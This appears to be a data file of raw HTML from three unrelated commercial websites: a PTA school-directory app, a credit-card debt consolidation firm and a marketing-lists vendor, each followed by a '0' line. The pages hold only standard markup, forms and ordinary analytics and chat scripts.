transparent"><div class="fancy_heading fancy_heading_icon"><div class="animate" data-anim-type="fadeIn"><h2 class="title">PTA Management Made Super Simple</h2></div></div></div><div class="column mcb-column two-fifth column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://www.youtube.com/watch?v=HEXNlxpYgVs&index=1&list=PLaWDxt9EDXJAaBwHrrry7mScmxobbPuLR" target="_blank" style=" background-color:#66cc66 !important; color:#FCFCFC;" ><span class="button_label">Show Me the App</span></a></div></div><div class="column mcb-column two-fifth column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://my-schedule.timetrade.com/app/td-3486126/workflows/qrbr1/schedule/welcome?wfsid=16a5bde1-baba97f6-16a5be29-baba97f6-00000004-57soqcffpb2n02oajkadalrsu92h4cdl&view=full&fs=1" target="_blank" style=" background-color:#66cc66 !important; color:#FCFCFC;" ><span class="button_label">Schedule a Demo</span></a></div></div></div></div></div></div><div class="section mcb-section " style="padding-top:0px; padding-bottom:0px; background-color:" ><div class="section_wrapper mcb-section-inner"><div class="wrap mcb-wrap one valign-top clearfix" style="padding:40px" ><div class="mcb-wrap-inner"><div class="column mcb-column one column_fancy_heading "><div class="fancy_heading fancy_heading_icon"><div class="animate" data-anim-type="fadeInUp"><h2 class="title">MobileArq, a one stop solution for your PTA & PTO</h2></div></div></div><div class="column mcb-column one column_image "><div class="animate" data-anim-type="fadeIn"><div class="image_frame image_item no_link scale-with-grid aligncenter has_border" ><div class="image_wrapper"><img class="scale-with-grid" src="https://mobilearq.com/wp-content/uploads/2018/12/Please-dont-make-..-1-min.jpg" alt="Please don't make ..-1-min" width="1100" height="600" /></div></div></div></div><div class="column mcb-column one column_column column-margin-"><div class="column_attr align_center animate" data-anim-type="fadeIn" style=""><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:200"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:25px; line-height:25px; font-weight:200; color:#404040;">Enjoy your PTA experience and let MobileArq do the school directory and fundraisers</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:25px; line-height:25px; font-weight:400; color:#404040;">Get a free trial of MobileArq School Directory+ and see for yourself!</div></div></div><div class="column mcb-column one-third column_placeholder"><div class="placeholder">&nbsp;</div></div><div class="column mcb-column one-third column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://mobilearq.com/inquiry-support/" style=" background-color:#66cc66 !important; color:white;" ><span class="button_label">Learn More</span></a></div></div><div class="column mcb-column one-third column_placeholder"><div class="placeholder">&nbsp;</div></div></div></div></div></div><div class="section the_content no_content"><div class="section_wrapper"><div class="the_content_wrapper"></div></div></div></div></div></div></div><footer id="Footer" class="clearfix"><div class="widgets_wrapper" style=""><div class="container"><div class="column one-third"><aside id="media_image-2" class="widget widget_media_image"><img width="75" height="75" src="https://mobilearq.com/wp-content/uploads/2016/12/cropped-MobileArq-Icon-N-512X512-e1528124913780.png" class="image wp-image-10675 attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></aside><aside id="custom_html-13" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><p> <br> <br> <br></p></div></aside><aside id="custom_html-2" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a href="http://bit.ly/MA-Apple-link"><img src="https://mobilearq.com/wp-content/uploads/2018/06/Download_on_the_App_Store_Badge_US-UK_RGB_blk_092917-e1527787764850-min.png/"/></a> <a href="http://bit.ly/MA-android-app-link"><img src="https://mobilearq.com/wp-content/uploads/2018/06/google-play-badge-e1527787782818-min.png" /></a></div></aside></div><div class="column one-third"><aside id="custom_html-14" class="widget_text widget widget_custom_html"><h4>News 12 Interview (Part 1 &#038; 2)</h4><div class="textwidget custom-html-widget"><a href="http://newjersey.news12.com/clip/14391597/moms-minute-mobile-arq-school-app-part-1"> <img title="News 12" alt="News 12" src="https://mobilearq.com/wp-content/uploads/2018/12/NJ12-part-1N.jpg" width="100" height="100" /> </a> <a href="http://newjersey.news12.com/clip/14391644/moms-minute-mobilearq-school-app-part-2"> <img title="News 12" alt="News 12" src="https://mobilearq.com/wp-content/uploads/2018/12/NJ12-part-2N.jpg" width="100" height="100" /> </a></div></aside><aside id="text-10" class="widget widget_text"><h4>School Zone Interview</h4><div class="textwidget"><p><a href="https://schoolzonepodcast.com/mobilearq-with-niru mallavarupu/">SchoolZone podcast with Niru Mallavarupu</a></p></div></aside></div><div class="column one-third"><aside id="text-12" class="widget widget_text"><div class="textwidget"><p><a href="https://www.facebook.com/groups/1646418169010709/"><img src="https://mobilearq.com/wp-content/uploads/2018/06/main-qimg-d77a3493115f1f7a72777a343bb234d8-c-e1528222542598.jpg" /></a></p></div></aside><aside id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><p> <br> <br> <br></p> <a href="https://www.facebook.com/MobileArq"> <img title="Facebook" alt="Facebook" src="https://mobilearq.com/wp-content/uploads/2018/12/FacebookWN.png" width="50" height="50" /> </a> <a href="https://twitter.com/mobilearq"> <img title="Twitter" alt="Twitter" src="https://mobilearq.com/wp-content/uploads/2018/12/Twitter1WN.png" width="50" height="50" /> </a> <a href="https://www.youtube.com/channel/UCK_7af53icSgRno2cV7icjQ"> <img title="YouTube" alt="YouTube" src="https://mobilearq.com/wp-content/uploads/2018/12/YoutubeWN.png" width="50" height="50" /> </a> <a href="https://www.linkedin.com/in/nmallavarupu"> <img title="LinkedIn" alt="LinkedIn" src="https://mobilearq.com/wp-content/uploads/2018/12/LinkedinWN.png" width="50" height="50" /> </a> <a href="https://www.pinterest.com/mobilearq/"> <img title="Pinterest" alt="Pinterest" src="https://mobilearq.com/wp-content/uploads/2018/12/PinterestWN.png" width="50" height="50" /> </a></div></aside></div></div></div><div class="footer_copy"><div class="container"><div class="column one"><div class="copyright"> LocalArq Inc., dba MobileArq © 2012-2018</div><nav id="social-menu" class="menu-main-menu-container"><ul id="menu-main-menu-1" class="social-menu"><li id="menu-item-11294" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-11269 current_page_item menu-item-has-children menu-item-11294"><a href="https://mobilearq.com/">Directory+</a></li><li id="menu-item-10201" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10201"><a href="https://mobilearq.com/blog/">Blog</a></li><li id="menu-item-11334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11334"><a href="https://mobilearq.com/our-story/">About</a></li><li id="menu-item-11328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11328"><a href="https://mobilearq.com/contactus/">Contact Us</a></li></ul></nav></div></div></div></footer></div> <script type='text/javascript'>var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};</script> <script id="mfn-dnmc-custom-js">// /* Light YouTube Embeds by @labnol */ document.addEventListener("DOMContentLoaded", function() { var div, n, v = document.getElementsByClassName("youtube-player"); for (n = 0; n < v.length; n++) { div = document.createElement("div"); div.setAttribute("data-id", v[n].dataset.id); div.innerHTML = labnolThumb(v[n].dataset.id); div.onclick = labnolIframe; v[n].appendChild(div); } }); function labnolThumb(id) { var thumb = '<img src="https://i.ytimg.com/vi/ID/hqdefault.jpg">', play = '<div class="play"></div>'; return thumb.replace("ID", id) + play; } function labnolIframe() { var iframe = document.createElement("iframe"); var embed = "https://www.youtube.com/embed/ID?autoplay=1"; iframe.setAttribute("src", embed.replace("ID", this.dataset.id)); iframe.setAttribute("frameborder", "0"); iframe.setAttribute("allowfullscreen", "1"); this.parentNode.replaceChild(iframe, this); } //</script> <script type="text/javascript">if( window.innerWidth < 767 ) { jQuery( ".desk-table" ).remove(); }</script> <script type="text/javascript">jQuery( ".plus-price .price" ).before( "<div class='plusPriceSelect'><select name='amount' id='amount'><option value='298'>0 - 250 Families</option><option value='398'>251 - 500 Families</option><option value='498'>501 - 750 Families</option><option value='598'>751 - 1000 Families</option></select></div>" );</script> <script type="text/javascript">jQuery( ".premium-price .price" ).before( "<div class='premiumPriceSelect'><select><option value='0'>0 - 250 Families</option><option value='1'>251 - 500 Families</option><option value='2'>501 - 750 Families</option><option value='3'>751 - 1000 Families</option></select></div>" );</script> <script type="text/javascript">var plusPriceSelect = jQuery('.plusPriceSelect select'); var plusPrice = jQuery('.plus-price .price span'); var premiumPriceSelect = jQuery('.premiumPriceSelect select'); var premiumPrice = jQuery('.premium-price .price span'); jQuery(document).on("change", plusPriceSelect, function(e) { if(plusPriceSelect.val() == 397) { plusPrice.html('397'); jQuery('.plus input[name=amount]').val('397'); } else if(plusPriceSelect.val() == 597) { plusPrice.html('597'); jQuery('.plus input[name=amount]').val('597'); } else if(plusPriceSelect.val() == 797) { plusPrice.html('797'); jQuery('.plus input[name=amount]').val('797'); } else if(plusPriceSelect.val() == 997) { plusPrice.html('997'); jQuery('.plus input[name=amount]').val('997'); } }) jQuery(document).on("change", premiumPriceSelect, function(e) { if(premiumPriceSelect.val() == 0) { premiumPrice.html('298'); jQuery('.premium input[name=amount]').val('298'); } else if(premiumPriceSelect.val() == 1) { premiumPrice.html('398'); jQuery('.premium input[name=amount]').val('398'); } else if(premiumPriceSelect.val() == 2) { premiumPrice.html('498'); jQuery('.premium input[name=amount]').val('498'); } else if(premiumPriceSelect.val() == 3) { premiumPrice.html('598'); jQuery('.premium input[name=amount]').val('598'); } })</script> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-46699601-1', 'mobilearq.com'); ga('send', 'pageview');</script> <script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:562550,hjsv:5}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');</script> <script type="text/javascript">var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.tawk.to/58a5d3eb6871eb09f89a53bf/default'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();</script> <script>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1561149694139507'); fbq('track', 'PageView');</script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1561149694139507&ev=PageView&noscript=1" /></noscript> <script type="text/javascript" defer src="https://mobilearq.com/wp-content/cache/autoptimize/js/autoptimize_2d88468d3f2a0e199b1ae4bf529a7fa4.js"></script></body></html>
0
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <title>Centurion Financial</title> <!-- Favicon --> <link rel="apple-touch-icon" sizes="180x180" href="img/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="img/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="img/favicon/favicon-16x16.png"> <link rel="manifest" href="img/favicon/site.webmanifest"> <link rel="mask-icon" href="img/favicon/safari-pinned-tab.svg" color="#5bbad5"> <link rel="shortcut icon" href="img/favicon/favicon.ico"> <meta name="msapplication-TileColor" content="#2b5797"> <meta name="msapplication-config" content="img/favicon/browserconfig.xml"> <meta name="theme-color" content="#ffffff"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css"/> <link href="css/style.css" rel="stylesheet"> <!--[if lte IE 9]> <link rel="stylesheet" href="css/ie9.css"/><![endif]--> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div id="wrapper"> <!-- Navbar --> <nav class="cf__nav"> <div class="cf__nav-left"> <a href="./" class="cf__nav--brand"> <img src="img/logo/logo.svg" alt="cf Logo"> </a> <a href="#menu" class="cf__nav--gamb d-lg-none"> <i class="ion-android-menu open-icon"></i> <i class="ion-android-close close-icon" style="display: none"></i> </a> </div> <div class="d-none d-lg-flex align-items-center h-100 / ml-auto"> <ul class="list-inline cf__nav--links"> <li> <a href="./" title="Home">Home</a> </li> <li class="dropdown"> <a href="#" title="Our Solutions">Our Solutions</a> <ul class="dropdown-menu"> <li><a href="centurion-consolidator.html" title="Centurion Consolidator">Centurion Consolidator</a></li> <li><a href="centurion-accelerator.html" title="Centurion Accelerator">Centurion Accelerator</a></li> <li><a href="debt-calculator.html" title="CC Debt Payoff Calculator">CC Debt Payoff Calculator</a> </li> </ul> </li> <li class="dropdown"> <a href="#" title="Our Advantage">Our Advantage</a> <ul class="dropdown-menu"> <li><a href="our-principles.html" title="Our Principles">Our Principles</a></li> <li><a href="our-approach.html" title="What to Expect">What to Expect</a></li> <li><a href="our-financial-analyst.html" title="Our Financial Analysts">Our Financial Analysts</a></li> <li><a href="our-philosophy-on-debt.html" title="Our Philosophy on Debt">Our Philosophy on Debt</a></li> </ul> </li> <li class="dropdown"> <a href="#" title="About Centurion">About Centurion</a> <ul class="dropdown-menu"> <li><a href="about-us.html" title="About Us">About Us</a></li> <li><a href="contact-us.html" title="Contact Us">Contact Us</a></li> <li><a href="privacy-policy.html" title="Privacy Policy">Privacy Policy</a></li> <li><a href="terms-of-service.html" title="Terms of Service">Terms of Service</a></li> </ul> </li> <li><a class="btn-link active js-close-mobileNav js-freeConsultBtn">FREE CONSULTATION</a></li> </ul> </div> </nav> <!-- Mobile Menu --> <nav id="menu"> <ul class="links"> <li> <a href="#" class="submenu-toggle">Our Solutions</a> <ul class="ul-submenu"> <li class="submenu-back"><a href="#">Back</a></li> <li><a href="centurion-consolidator.html" title="Centurion Consolidator">Centurion Consolidator</a></li> <li><a href="centurion-accelerator.html" title="Centurion Accelerator">Centurion Accelerator</a></li> <li><a href="debt-calculator.html" title="CC Debt Payoff Calculator">CC Debt Payoff Calculator</a> </li> </ul> </li> <li> <a href="#" class="submenu-toggle">Our Advantage</a> <ul class="ul-submenu"> <li class="submenu-back"><a href="#">Back</a></li> <li><a href="our-principles.html" title="Our Principles">Our Principles</a></li> <li><a href="our-approach.html" title="What to Expect">What to Expect</a></li> <li><a href="our-financial-analyst.html" title="Our Financial Analysts">Our Financial Analysts</a></li> <li><a href="our-philosophy-on-debt.html" title="Our Philosophy on Debt">Our Philosophy on Debt</a></li> </ul> </li> <li> <a href="#" class="submenu-toggle">About Centurion</a> <ul class="ul-submenu"> <li class="submenu-back"><a href="#">Back</a></li> <li><a href="about-us.html" title="About Us">About Us</a></li> <li><a href="contact-us.html" title="Contact Us">Contact Us</a></li> <li><a href="privacy-policy.html" title="Privacy Policy">Privacy Policy</a></li> <li><a href="terms-of-service.html" title="Terms of Service">Terms of Service</a></li> </ul> </li> <li> <a href="#" class="btn-link btn-primary js-freeConsultBtn">FREE CONSULTATION</a> </li> </ul> </nav> <!-- MAIN CONTENT --> <main> <!-- Hero --> <section> <div class="cf__hero cf__hero--sm / py-10 / js-hero"> <div class="cf__hero--filter op-5"></div> <div class="cf__hero-video"> <video autoplay loop id="hero-video" poster="img/home/poster-vid.jpg"> <source src="img/home/bg-vid.mp4" type="video/mp4"/> <source src="img/home/bg-vid.webm" type="video/webm"/> <source src="img/home/bg-vid.ogv" type="video/ogv"/> Your browser does not support the video tag. I suggest you upgrade your browser. </video> </div> <div class="container position-relative z-index-2 / text-center text-sm-left"> <h1 class="color-white / mb-3">We Help People <span class="weight700">Payoff Credit Cards.</span> </h1> <div class="title-divider / mb-3 mx-auto mx-sm-0"></div> <p class="color-white text-md / mb-5">A new way of talking about, preparing for and consolidating debt.</p> <a href="#" class="btn btn-primary js-freeConsultBtn">START YOUR CONSULTATION</a> </div> <div class="cf__hero--video-poster" style="background-image: url(img/home/poster-vid.jpg);"> </div> </div> </section> <!-- Expect the unexpected --> <section class="bg-img py-10" style="background-image: url(img/home/2.jpg)"> <div class="bg-overlay bg-overlay--grey op-5"></div> <div class="container"> <div class="row"> <div class="col-md-6 ml-auto / text-center text-sm-left"> <h1 class="mb-3 color-white">Expect the <span class="weight700">unexpected.</span></h1> <div class="title-divider / mb-3 mx-auto mx-sm-0"></div> <p class="mb-5 color-white">Learn about our unique approach to personal finance.</p> <a href="our-approach.html" class="btn btn-primary">Read More</a> </div> </div> </div> </section> <!-- Your best interest at heart. --> <section class="pt-6"> <div class="container"> <div class="row align-items-center"> <div class="col-sm-7 py-10 / text-center text-sm-left"> <h1 class="mb-3"><span class="weight700">Your best interest</span> at heart.</h1> <div class="title-divider / mb-3 mx-auto mx-sm-0"></div> <p class="text-md mb-5">We understand we can't be all things to all of our clients.</p> <a href="our-philosophy-on-debt.html" class="btn btn-primary">Read More</a> </div> <div class="col-sm-5"> <img src="img/home/1.jpg" alt="person"> </div> </div> </div> </section> <!-- Testimonials --> <section class="pt-10 pb-4 bg-primary"> <!-- Title --> <div class="container / mb-8"> <h1 class="color-white text-center / mb-3">What <span class="weight500">our clients</span> say about us.</h1> <div class="title-divider title-divider--grey / mx-auto"></div> <!-- Add Pagination for slider --> <div class="swiper-pagination swiper-pagination-custom"></div> </div> <!-- Swiper --> <div class="swiper-container"> <div class="swiper-wrapper"> <!-- Slide --> <div class="swiper-slide"> <div class="container"> <div class="row"> <div class="feedback"> <p class="color-white">"Best decision I've ever made! They really care about "you" and making your life easier. They answer all of your questions and are very detailed."</p> <span class="feedback-author color-white">- Anika, - Jose San Jose, CA</span> </div> </div> </div> </div> <!-- Slide --> <div class="swiper-slide"> <div class="container"> <div class="row"> <div class="feedback"> <p class="color-white">"So fast and easy, no jumping through hoops. The loan was processed quickly and as promised."</p> <span class="feedback-author color-white">- Maureen, Torrance, CA</span> </div> </div> </div> </div> <!-- Slide --> <div class="swiper-slide"> <div class="container"> <div class="row"> <div class="feedback"> <p class="color-white">"I was approved for enough to consolidate some higher interest debt into a manageable payment. The process was simple and easy. They closed the loan fast."</p> <span class="feedback-author color-white">- Justin Riverside, CA</span> </div> </div> </div> </div> </div> <div class="swiper-pagination swiper-pagination--custom swiper-pagination--white / mt-4"></div> </div> </section> </main> <!-- FOOTER --> <footer class="footer"> <div class="container"> <!-- Row with logo and phone --> <div class="row m-b-2"> <div class="col-sm-6 col-md-4 mb-4"> <div class="footer__logo"> <img src="img/logo/logo.svg" alt="cf Logo"> </div> <h4 class="weight500 mb-0">Speak to one of our friendly representatives.</h4> <a href="tel:8009913260">800.991.3260</a> </div> <div class="col-sm-6 col-md-3"> <ul class="list-unstyled"> <li class="list-header">SOLUTIONS</li> <li><a href="centurion-consolidator.html" title="Centurion Consolidator">Centurion Consolidator</a></li> <li><a href="centurion-accelerator.html" title="Centurion Consolidator">Centurion Accelerator</a></li> <li><a href="debt-calculator.html" title="CC Debt Payoff Calculator">CC Debt Payoff Calculator</a></li> </ul> </div> <div class="col-sm-6 col-md-3"> <ul class="list-unstyled"> <li class="list-header">ADVANTAGE</li> <li><a href="our-principles.html" title="Our Principles">Our Principles</a></li> <li><a href="our-approach.html" title="What to Expect">What to Expect</a></li> <li><a href="our-financial-analyst.html" title="Our Financial Analysts">Our Financial Analysts</a></li> <li><a href="our-philosophy-on-debt.html" title="Our Philosophy on Debt">Our Philosophy on Debt</a></li> </ul> </div> <div class="col-sm-6 col-md-2"> <ul class="list-unstyled"> <li class="list-header">ABOUT CENTURION</li> <li><a href="about-us.html" title="About Us">About Us</a></li> <li><a href="contact-us.html" title="Contact Us">Contact Us</a></li> <li><a href="privacy-policy.html" title="Privacy Policy">Privacy Policy</a></li> <li><a href="terms-of-service.html" title="Terms of Service">Terms of Service</a></li> </ul> </div> </div> <!-- Row with Links --> <div class="row"> <div class="col-md-4"> <ul class="list-inline list-social mb-4 mb-md-0"> <li> <a href="https://www.facebook.com/CenturionFinancialUS/"><i class="ion-social-facebook"></i></a> </li> <li> <a href="https://www.instagram.com/centurionfinancialus/"><i class="ion-social-instagram"></i></a> </li> </ul> </div> <div class="col-md-8 d-flex align-items-center"> <span class="copyright">© 2019 Centurion Financial. All rights reserved.</span> </div> </div> <hr class="mb-10"> <!-- Additional text --> <div class="footer__info"> <p>Disclaimer: Individual results will vary based on circumstances, including your ability to save sufficient funds and completing the program. We do not guarantee that your debts will be lowered by a specific amount or percentage or that you will be debt-free within a specific period of time.</p> <p>We do not assume or pay any consumer debt, or provide tax, bankruptcy, accounting or legal advice or credit repair services. Debt Settlement programs do not make monthly payments to creditors. Not available in all states. Please contact a tax professional to discuss tax consequences of settlement. <br> Read and understand all program materials prior to enrollment. This web-site and the content within does not constitute an offer or solicitation to lend.</p> <p>We will securely submit the information you provide to a lender. Providing your information does not guarantee approval for a product offering.</p> </div> </div> <!-- end of container --> </footer> </div> <div class="modal fade modal-consult" id="freeConsultModal" tabindex="-1" role="dialog" aria-labelledby="freeConsultModal" aria-hidden="true"> <button type="button" class="close" data-dismiss="modal"><i class="ion-android-close"></i></button> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-body"> <div id="modal-form" class="pt-8"> <div class="text-center mb-4"> <h2>Start your free consultation</h2> </div> <div class="consult__form"> <span class="weight300 text-sm">*Required information</span> <form action="consult-form.php" id="ajax-consult-form" method="post"> <div class="input-wrap mb-3"> <input class="input-effect" type="text" name="consult-name" id="consult-name" required> <label for="consult-name">Name*</label> </div> <div class="input-wrap mb-3"> <input class="input-effect" type="email" name="consult-email" id="consult-email" required> <label for="consult-email">Email*</label> </div> <div class="input-wrap mb-3"> <input class="input-effect" type="tel" pattern="\d*" name="consult-phone" id="consult-phone" required> <label for="consult-phone">Phone Number*</label> </div> <!-- Select has to have first option as a placeholder with class 'select-placeholder'. It is not visible <div class="input-wrap mb-3"> <select class="input-effect" id="consult-purpose" name="consult-purpose"> <option value="Placeholder" class="select-placeholder"></option> <option value="Refinance Mortgage">Refinance Mortgage</option> <option value="Purchase a Home">Purchase a Home</option> </select> <label for="consult-purpose">Purpose</label> </div>--> <div class="input-wrap mb-3"> <input class="input-effect" type="text" pattern="\d*" name="consult-debt-amount" id="consult-debt-amount"> <label for="consult-debt-amount">Debt Amount</label> </div> <div class="form__secure mb-6"> <div class="form__secure--img"> <img src="img/common/lock.svg" alt=""> </div> <div class="form__secure--text"> <p class="text-sm weight300">Your details in this form are protected and will be securely submitted to us. </p> </div> </div> <div class="text-center" id="ajax-consult-form-actions"> <button class="btn btn-primary" type="submit" id="js-modalForm-submitBtn">SEND</button> </div> </form> </div> <p class="text-xsm text-center" id="ajax-consult-form-submit-message">By submitting this form, I authorize Centurion Financial US LLC to contact me by phone at the number provided above, including mobile phone, email or mail and using automatic dialing equipment, to give me information about Centurion Financial products and services. Consent is not required as a condition of subscribing to our services. Centurion Financial does not broker loans and does not make and/or fund any product offerings, loans, or credit declaration. The web platform will securely submit the information you provide to a lender. Providing your information on the website does not guarantee approval for a product offering. For details, questions, or concerns regarding your application, please contact your lender directly. Loans are offered by Centurion Financial affiliates. Loans are not offered in all states.</p> </div> <div id="modal-form-success" class="text-center"> <h2 class="mb-6">Thank you for your inquiry.<br>We will get back to you within 48-hours.</h2> <button class="btn" data-dismiss="modal">CLOSE</button> </div> </div> </div> </div> </div> <!-- ### SCRIPTS BELOW ### --> <!-- All Js --> <script src="js/compressed.js"></script> <!-- Initial Swiper --> <script> // Swiper Slider init $(function () { var swiper = new Swiper('.swiper-container', { autoplay: { delay: 4500 }, pagination: { el: '.swiper-pagination', }, paginationClickable: true }); }) </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="http://www.list57.com/xmlrpc.php" /> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='http://www.list57.com';var et_post_id='79';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>List57 Marketing Lists, Leads, Databases Targeting Business &amp; Consumers</title> <!-- This site is optimized with the Yoast SEO Premium plugin v10.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="List57 has marketing lists, leads and databases help grow your business quickly. Market to businesses (B2B) or consumers (B2C) nationwide and worldwide."/> <link rel="canonical" href="http://www.list57.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="List57 Marketing Lists, Leads, Databases Targeting Business &amp; Consumers" /> <meta property="og:description" content="List57 has marketing lists, leads and databases help grow your business quickly. Market to businesses (B2B) or consumers (B2C) nationwide and worldwide." /> <meta property="og:url" content="http://www.list57.com/" /> <meta property="og:site_name" content="List57.com" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"http://www.list57.com/#website","url":"http://www.list57.com/","name":"List57.com","potentialAction":{"@type":"SearchAction","target":"http://www.list57.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"http://www.list57.com/","sameAs":["https://www.facebook.com/List57/","https://www.linkedin.com/in/list57/","http://www.youtube.com/c/GeneGillList57","https://twitter.com/list57com"],"@id":"http://www.list57.com/#organization","name":"List57","logo":"http://www.list57.com/wp-content/uploads/2009/10/logo300h.jpg"}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="List57.com &raquo; Feed" href="http://www.list57.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="List57.com &raquo; Comments Feed" href="http://www.list57.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.list57.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="divi-child v.1.0" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.list57.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='http://www.list57.com/wp-content/themes/Divi/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='autocomplete.css-css' 